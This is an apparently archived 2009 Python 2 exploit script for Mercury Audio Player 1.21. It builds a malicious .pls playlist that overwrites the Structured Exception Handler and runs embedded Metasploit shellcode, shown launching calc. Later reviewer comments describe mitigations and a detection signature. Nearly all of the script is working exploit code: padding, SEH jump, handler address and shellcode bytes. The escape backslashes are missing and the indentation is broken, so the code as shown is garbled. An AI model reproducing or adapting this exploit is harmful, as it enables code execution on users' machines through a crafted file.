# Title : Mercury Audio Player 1.21 (.pls) SEH Overwrite Exploit
# Published : 2009-04-30
# Author : His0k4
#usage: exploit.py
# Proof-of-concept generator: writes a malformed .pls playlist ("exploit.pls")
# whose File1 entry is long enough to overwrite the Structured Exception
# Handler (SEH) record of Mercury Audio Player 1.21 when the file is opened.
# Python 2 source (print statements, raw_input); it does not run under Python 3.
#
# NOTE(review): the handler address in `seh` below is a fixed pointer into
# msacm32.drv, so the file only works on the exact image the banner names
# (Windows XP Pro SP3 EN); SafeSEH/SEHOP, DEP and ASLR are the platform
# defences against this SEH-overwrite pattern on later Windows versions.
# Detection: a .pls whose File1 value is several KB long and dominated by a
# run of 0x41 ('A') bytes (see `junk`) is a clear signature for this PoC.
print "**************************************************************************"
print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploitn"
print " Refer: http://www.milw0rm.com/exploits/8578"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " greetz: TO ELITE ALGERIANS,snakespc.comn"
print "**************************************************************************"
# .pls framing around the payload. The hex values in header1 decode to
# "[Playlist]\r\nFile1=" and those in header2 to ".mp3\r\nTitle1= silence is gold\r\n"
# "NumberOfEntries=1\r\nVersion=2\r\n", i.e. a one-entry playlist whose File1
# value is the overlong string assembled below.
header1 = (
"x5bx50x6cx61x79x6cx69x73x74x5dx0dx0ax46x69x6cx65"
"x31x3d")
header2 = (
"x2ex6dx70x33x0dx0ax54x69x74x6cx65x31x3dx20x73x69"
"x6cx65x6ex63x65x20x69x73x20x67x6fx6cx64x0dx0ax4e"
"x75x6dx62x65x72x4fx66x45x6ex74x72x69x65x73x3dx31"
"x0dx0ax56x65x72x73x69x6fx6ex3dx32x0dx0a")
# 31 bytes of padding; presumably the distance from the start of the File1
# value to the SEH record for this build -- TODO confirm, not derivable here.
buff = "x41" * 31
# Overwritten "next SEH" pointer: a 2-byte short jump (EB 06) followed by two
# NOPs, the usual layout that skips over the handler address into the payload.
next_seh = "xEBx06x90x90"
# Overwritten handler address (little-endian), a hard-coded pointer into
# msacm32.drv; see the mitigation note at the top of the file.
seh = "xB8x15xD1x72" #msacm32.drv
# 3000 filler bytes appended after the payload; the long 'A' run is the most
# visible artefact of the generated file (see detection note above).
junk = "x41"*3000
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Stock Metasploit win32_exec stub launching calc, as labelled above -- the
# benign "prove execution" payload conventionally used in public PoCs.
shellcode = (
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe8"
"x61xfbx36x83xebxfcxe2xf4x14x89xbfx36xe8x61x70x73"
"xd4xeax87x33x90x60x14xbdxa7x79x70x69xc8x60x10x7f"
"x63x55x70x37x06x50x3bxafx44xe5x3bx42xefxa0x31x3b"
"xe9xa3x10xc2xd3x35xdfx32x9dx84x70x69xccx60x10x50"
"x63x6dxb0xbdxb7x7dxfaxddx63x7dx70x37x03xe8xa7x12"
"xecxa2xcaxf6x8cxeaxbbx06x6dxa1x83x3ax63x21xf7xbd"
"x98x7dx56xbdx80x69x10x3fx63xe1x4bx36xe8x61x70x5e"
"xd4x3excaxc0x88x37x72xcex6bxa1x80x66x80x91x71x32"
"xb7x09x63xc8x62x6fxacxc9x0fx02x9ax5ax8bx61xfbx36")
# Final file layout: .pls prefix, padding, SEH record (next_seh + seh),
# payload, filler, then the remainder of the playlist.
exploit = header1 + buff + next_seh + seh + shellcode + junk + header2
# Writes "exploit.pls" into the current working directory. The bare `except`
# swallows every error (e.g. permission denied, disk full) and prints only
# "Error", so a failed write is indistinguishable from a bug in the script.
# raw_input() pauses so a double-clicked console window stays open.
try:
out_file = open("exploit.pls",'w')
out_file.write(exploit)
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"
# www.Syue.com [2009-04-30]